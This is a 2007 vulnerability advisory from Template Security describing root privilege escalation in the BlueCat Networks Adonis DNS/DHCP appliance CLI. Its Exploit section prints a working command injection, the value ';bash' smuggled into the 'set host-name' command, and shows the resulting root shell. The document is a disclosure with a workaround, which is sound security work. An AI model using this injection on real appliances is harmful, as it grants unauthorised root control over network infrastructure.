BlueCat Networks Adonis CLI root privilege escalation
Date: 2007-08-16
Advisory ID: TS-2007-003-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0
Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History
Template Security has discovered a root privilege escalation
vulnerability in the BlueCat Networks Adonis DNS/DHCP appliance
which allows the admin user to gain root privilege from the
Command Line Interface (CLI).
Adonis version 5.0.2.8 was tested.
The admin account on the Adonis DNS/DHCP appliance provides
access to a CLI that allows an administrator to perform tasks
such as setting the IP address, netmask, system time and system
hostname. By entering a certain command sequence, the
administrator is able to execute a command as root.
Access to the admin account is the same as root access on the
appliance.
Here we use the 'set host-name' CLI command to execute a root
shell:
:adonis>set host-name ;bash
adonis.katter.org
root@adonis:~# id
uid=0(root) gid=0(root) groups=0(root)
NOTE: There may be other command sequences that accomplish the
same result.
Only provide admin account access to administrators that also
have root account access on the appliance.
Contact the vendor.
forloop discovered this vulnerability while enjoying a Tuborg
Gold. forloop is a member of Template Security.
2007-08-16: Revision 0 released